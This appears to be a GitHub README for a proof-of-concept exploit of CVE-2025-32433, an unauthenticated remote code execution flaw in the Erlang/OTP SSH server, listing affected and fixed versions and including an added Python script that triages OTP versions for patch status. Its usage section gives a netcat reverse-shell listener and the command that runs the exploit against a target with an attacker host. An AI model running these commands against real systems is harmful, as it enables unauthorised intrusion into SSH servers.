CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

CVE-2025-32433 – Erlang/OTP SSH RCE PoC

Overview

PoC showing unauthenticated remote code execution in Erlang/OTP SSH server.
By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.

  • CVE: CVE-2025-32433
  • CVSS Score: 10.0 (Critical)
  • Affected Versions:
    • Versions before OTP-27.3.3
    • Versions before OTP-26.2.5.11
    • Versions before OTP-25.3.2.20

This issue is patched in OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
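
For patch triage, the fixed releases named above can be checked against an inventory of OTP versions. The following is an added example, not part of the PoC repository; the hostnames and sample versions are constructed, and branches for which this page names no fixed release are reported as unlisted rather than guessed.

```python
import re

# Fixed release per branch, as stated on this page.
PATCHED = {27: (27, 3, 3), 26: (26, 2, 5, 11), 25: (25, 3, 2, 20)}
_VERSION_RE = re.compile(r"^(?:OTP-)?(\d+(?:\.\d+)*)$")

def parse_otp_version(text):
    """Turn 'OTP-26.2.5.11' or '26.2.5.11' into a tuple of ints."""
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised OTP version: {text!r}")
    return tuple(int(part) for part in match.group(1).split("."))

def _pad(version, length):
    # 27.3 and 27.3.0 name the same release; pad so tuple comparison agrees.
    return version + (0,) * (length - len(version))

def classify(text):
    """Return 'patched', 'vulnerable' or 'unlisted-branch' for one version."""
    version = parse_otp_version(text)
    fixed = PATCHED.get(version[0])
    if fixed is None:
        return "unlisted-branch"  # assumption: no verdict without a listed fix
    width = max(len(version), len(fixed))
    # Numeric comparison: 26.2.5.9 sorts before 26.2.5.11, unlike string order.
    if _pad(version, width) >= _pad(fixed, width):
        return "patched"
    return "vulnerable"

def triage(inventory):
    """Map host -> status; unparseable strings are flagged for manual review."""
    report = {}
    for host, text in inventory.items():
        try:
            report[host] = classify(text)
        except ValueError:
            report[host] = "needs-review"
    return report

# Constructed sample inventory (hostnames and versions are made up).
SAMPLE = {
    "mq-01": "OTP-27.3.3", "mq-02": "OTP-27.3.2",
    "db-01": "26.2.5.11", "db-02": "OTP-26.2.5.9",
    "old-01": "OTP-24.3.4", "dev-01": "27.0-rc3",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE).items():
        print(f"{host}: {status}")
```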

Usage

GitHub repo link

https://github.com/dollarboysushil/CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

Listener Setup:

nc -lvnp 1234

Run Exploit:

python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : Target IP
  • --rport : Target SSH port
  • --lhost : Your IP for reverse shell
  • --lport : Your listener port

Disclaimer

This repository is for educational purposes only. Do not use this exploit against systems you do not own or have explicit permission to test. Misuse may be illegal and is strictly prohibited.
